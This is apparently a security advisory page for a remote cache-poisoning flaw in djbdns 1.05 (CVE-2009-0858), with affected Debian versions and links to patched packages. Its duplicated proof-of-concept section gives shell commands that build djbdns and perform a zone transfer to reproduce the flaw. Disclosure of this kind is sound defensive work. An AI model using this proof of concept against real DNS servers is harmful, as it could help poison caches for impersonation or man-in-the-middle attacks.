djbdns Long Response Packet Remote Cache Poisoning Vulnerability
BID:33937
Info
djbdns Long Response Packet Remote Cache Poisoning Vulnerability
| Bugtraq ID: | 33937 |
| Class: | Design Error |
| CVE: |
CVE-2009-0858 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 27 2009 12:00AM |
| Updated: | Jul 15 2009 10:36PM |
| Credit: | Matthew Dempsky |
| Vulnerable: |
djbdns djbdns 1.05 Debian Linux 5.0 sparc Debian Linux 5.0 s/390 Debian Linux 5.0 powerpc Debian Linux 5.0 mipsel Debian Linux 5.0 mips Debian Linux 5.0 m68k Debian Linux 5.0 ia-64 Debian Linux 5.0 ia-32 Debian Linux 5.0 hppa Debian Linux 5.0 armel Debian Linux 5.0 arm Debian Linux 5.0 amd64 Debian Linux 5.0 alpha Debian Linux 5.0 |
| Not Vulnerable: | |
Discussion
djbdns Long Response Packet Remote Cache Poisoning Vulnerability
The 'djbdns' package is prone to a remote cache-poisoning vulnerability.
An attacker may leverage this issue to manipulate cache data, potentially facilitating man-in-the-middle, site-impersonation, or denial-of-service attacks.
This issue affects djbdns 1.05; other versions may also be vulnerable.
The 'djbdns' package is prone to a remote cache-poisoning vulnerability.
An attacker may leverage this issue to manipulate cache data, potentially facilitating man-in-the-middle, site-impersonation, or denial-of-service attacks.
This issue affects djbdns 1.05; other versions may also be vulnerable.
Exploit / POC
djbdns Long Response Packet Remote Cache Poisoning Vulnerability
The following proof of concept is available:
# Download and build ucspi-tcp-0.88.
$ curl -O http://cr.yp.to/ucspi-tcp/ucspi-tcp-0.88.tar.gz
$ tar -zxf ucspi-tcp-0.88.tar.gz
$ echo 'gcc -include /usr/include/errno.h -O' > ucspi-tcp-0.88/conf-cc
$ make -C ucspi-tcp-0.88
# Download and build djbdns-1.05.
$ curl -O http://cr.yp.to/djbdns/djbdns-1.05.tar.gz
$ tar -zxf djbdns-1.05.tar.gz
$ echo 'gcc -include /usr/include/errno.h -O' > djbdns-1.05/conf-cc
$ make -C djbdns-1.05
# Use tcpclient and axfr-get to do a zone transfer for
# www.example.com from www.example2.com.
$ ./ucspi-tcp-0.88/tcpclient www.example.com 53 ./djbdns-1.05/axfr-get www.example.com data data.tmp
# Use tinydns-data to compile data into data.cdb.
$ ./djbdns-1.05/tinydns-data
# Simulate an A query for www.example.com using the data
# from the zone transfer.
$ ./djbdns-1.05/tinydns-get a www.example.com
The following proof of concept is available:
# Download and build ucspi-tcp-0.88.
$ curl -O http://cr.yp.to/ucspi-tcp/ucspi-tcp-0.88.tar.gz
$ tar -zxf ucspi-tcp-0.88.tar.gz
$ echo 'gcc -include /usr/include/errno.h -O' > ucspi-tcp-0.88/conf-cc
$ make -C ucspi-tcp-0.88
# Download and build djbdns-1.05.
$ curl -O http://cr.yp.to/djbdns/djbdns-1.05.tar.gz
$ tar -zxf djbdns-1.05.tar.gz
$ echo 'gcc -include /usr/include/errno.h -O' > djbdns-1.05/conf-cc
$ make -C djbdns-1.05
# Use tcpclient and axfr-get to do a zone transfer for
# www.example.com from www.example2.com.
$ ./ucspi-tcp-0.88/tcpclient www.example.com 53 ./djbdns-1.05/axfr-get www.example.com data data.tmp
# Use tinydns-data to compile data into data.cdb.
$ ./djbdns-1.05/tinydns-data
# Simulate an A query for www.example.com using the data
# from the zone transfer.
$ ./djbdns-1.05/tinydns-get a www.example.com
Solution / Fix
djbdns Long Response Packet Remote Cache Poisoning Vulnerability
Solution:
Updates are available. Please see the references for more information.
Debian Linux 5.0 alpha
Debian Linux 5.0 amd64
Debian Linux 5.0 ia-32
Debian Linux 5.0 hppa
Debian Linux 5.0 mips
Debian Linux 5.0 ia-64
Debian Linux 5.0 s/390
Debian Linux 5.0 m68k
Debian Linux 5.0 arm
Debian Linux 5.0 mipsel
Debian Linux 5.0 powerpc
Debian Linux 5.0 armel
Debian Linux 5.0
Debian Linux 5.0 sparc
Solution:
Updates are available. Please see the references for more information.
Debian Linux 5.0 alpha
-
Debian dbndns_1.05-4+lenny1_alpha.deb
http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+le nny1_alpha.deb -
Debian djbdns_1.05-4+lenny1_alpha.deb
http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+le nny1_alpha.deb -
Debian dnscache-run_1.05-4+lenny1_all.deb
http://security.debian.org/pool/updates/main/d/djbdns/dnscache-run_1.0 5-4+lenny1_all.deb
Debian Linux 5.0 amd64
-
Debian dbndns_1.05-4+lenny1_amd64.deb
http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+le nny1_amd64.deb -
Debian djbdns_1.05-4+lenny1_amd64.deb
http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+le nny1_amd64.deb -
Debian dnscache-run_1.05-4+lenny1_all.deb
http://security.debian.org/pool/updates/main/d/djbdns/dnscache-run_1.0 5-4+lenny1_all.deb
Debian Linux 5.0 ia-32
-
Debian dbndns_1.05-4+lenny1_i386.deb
http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+le nny1_i386.deb -
Debian djbdns_1.05-4+lenny1_i386.deb
http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+le nny1_i386.deb -
Debian dnscache-run_1.05-4+lenny1_all.deb
http://security.debian.org/pool/updates/main/d/djbdns/dnscache-run_1.0 5-4+lenny1_all.deb
Debian Linux 5.0 hppa
-
Debian dbndns_1.05-4+lenny1_hppa.deb
http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+le nny1_hppa.deb -
Debian djbdns_1.05-4+lenny1_hppa.deb
http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+le nny1_hppa.deb -
Debian dnscache-run_1.05-4+lenny1_all.deb
http://security.debian.org/pool/updates/main/d/djbdns/dnscache-run_1.0 5-4+lenny1_all.deb
Debian Linux 5.0 mips
-
Debian dbndns_1.05-4+lenny1_mips.deb
http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+le nny1_mips.deb -
Debian djbdns_1.05-4+lenny1_mips.deb
http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+le nny1_mips.deb -
Debian dnscache-run_1.05-4+lenny1_all.deb
http://security.debian.org/pool/updates/main/d/djbdns/dnscache-run_1.0 5-4+lenny1_all.deb
Debian Linux 5.0 ia-64
-
Debian dbndns_1.05-4+lenny1_ia64.deb
http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+le nny1_ia64.deb -
Debian djbdns_1.05-4+lenny1_ia64.deb
http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+le nny1_ia64.deb -
Debian dnscache-run_1.05-4+lenny1_all.deb
http://security.debian.org/pool/updates/main/d/djbdns/dnscache-run_1.0 5-4+lenny1_all.deb
Debian Linux 5.0 s/390
-
Debian dbndns_1.05-4+lenny1_s390.deb
http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+le nny1_s390.deb -
Debian djbdns_1.05-4+lenny1_s390.deb
http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+le nny1_s390.deb -
Debian dnscache-run_1.05-4+lenny1_all.deb
http://security.debian.org/pool/updates/main/d/djbdns/dnscache-run_1.0 5-4+lenny1_all.deb
Debian Linux 5.0 m68k
-
Debian dnscache-run_1.05-4+lenny1_all.deb
http://security.debian.org/pool/updates/main/d/djbdns/dnscache-run_1.0 5-4+lenny1_all.deb
Debian Linux 5.0 arm
-
Debian dbndns_1.05-4+lenny1_arm.deb
http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+le nny1_arm.deb -
Debian djbdns_1.05-4+lenny1_arm.deb
http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+le nny1_arm.deb -
Debian dnscache-run_1.05-4+lenny1_all.deb
http://security.debian.org/pool/updates/main/d/djbdns/dnscache-run_1.0 5-4+lenny1_all.deb
Debian Linux 5.0 mipsel
-
Debian dbndns_1.05-4+lenny1_mipsel.deb
http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+le nny1_mipsel.deb -
Debian djbdns_1.05-4+lenny1_mipsel.deb
http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+le nny1_mipsel.deb -
Debian dnscache-run_1.05-4+lenny1_all.deb
http://security.debian.org/pool/updates/main/d/djbdns/dnscache-run_1.0 5-4+lenny1_all.deb
Debian Linux 5.0 powerpc
-
Debian dbndns_1.05-4+lenny1_powerpc.deb
http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+le nny1_powerpc.deb -
Debian djbdns_1.05-4+lenny1_powerpc.deb
http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+le nny1_powerpc.deb -
Debian dnscache-run_1.05-4+lenny1_all.deb
http://security.debian.org/pool/updates/main/d/djbdns/dnscache-run_1.0 5-4+lenny1_all.deb
Debian Linux 5.0 armel
-
Debian dbndns_1.05-4+lenny1_armel.deb
http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+le nny1_armel.deb -
Debian djbdns_1.05-4+lenny1_armel.deb
http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+le nny1_armel.deb -
Debian dnscache-run_1.05-4+lenny1_all.deb
http://security.debian.org/pool/updates/main/d/djbdns/dnscache-run_1.0 5-4+lenny1_all.deb
Debian Linux 5.0
-
Debian dnscache-run_1.05-4+lenny1_all.deb
http://security.debian.org/pool/updates/main/d/djbdns/dnscache-run_1.0 5-4+lenny1_all.deb
Debian Linux 5.0 sparc
-
Debian dbndns_1.05-4+lenny1_sparc.deb
http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+le nny1_sparc.deb -
Debian djbdns_1.05-4+lenny1_sparc.deb
http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+le nny1_sparc.deb -
Debian dnscache-run_1.05-4+lenny1_all.deb
http://security.debian.org/pool/updates/main/d/djbdns/dnscache-run_1.0 5-4+lenny1_all.deb
References
djbdns Long Response Packet Remote Cache Poisoning Vulnerability
References:
References:
- djbdns Home Page (djbdns)